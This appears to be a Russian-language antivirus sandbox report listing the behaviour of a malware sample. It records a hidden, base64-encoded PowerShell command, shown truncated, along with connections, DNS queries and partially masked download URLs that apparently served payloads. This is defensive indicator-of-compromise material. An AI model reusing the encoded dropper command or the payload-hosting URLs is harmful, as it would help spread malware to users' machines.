Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADYAMAByAF8AaABjAD0AKAAnAEgAJwArACgAJwBlAHYAJwArACcANQA2ADYAJwApACsAJwBuACcAKQA7ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdABFAE0AcABcAHcAbwByAEQAXAAyADAAMQA5AF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1154142.cvr
- 'sa####amos.com.br':80
- 'ju##zyk.biz':80
- 'li###com.com.br':80
- 'cm###exham.com':80
- 'ly##inc.com':80
- 'hu###omains.com':443
- 'st######uranceonline.com':443
- 'te######estatefarms.com.au':443
- http://sa####amos.com.br/PLcbM/4oxcev0320/
- http://ju##zyk.biz/piotrek/IJilgckESlY/
- http://li###com.com.br/BKP_TinaPOS/CQSMl/
- http://cm###exham.com/video/N2lzhgh45/
- http://ly##inc.com/wp-content/uploads/attachments/XxM/
- 'hu###omains.com':443
- 'st######uranceonline.com':443
- 'te######estatefarms.com.au':443
- DNS ASK sa####amos.com.br
- DNS ASK ju##zyk.biz
- DNS ASK li###com.com.br
- DNS ASK cm###exham.com
- DNS ASK ly##inc.com
- DNS ASK hu###omains.com
- DNS ASK st######uranceonline.com
- DNS ASK te######estatefarms.com.au
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADYAMAByAF8AaABjAD0AKAAnAEgAJwArACgAJwBlAHYAJwArACcANQA2ADYAJwApACsAJwBuACcAKQA7ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdABFAE0AcABcAHcAbwByAEQAXAAyADAAMQA5AF...' (со скрытым окном)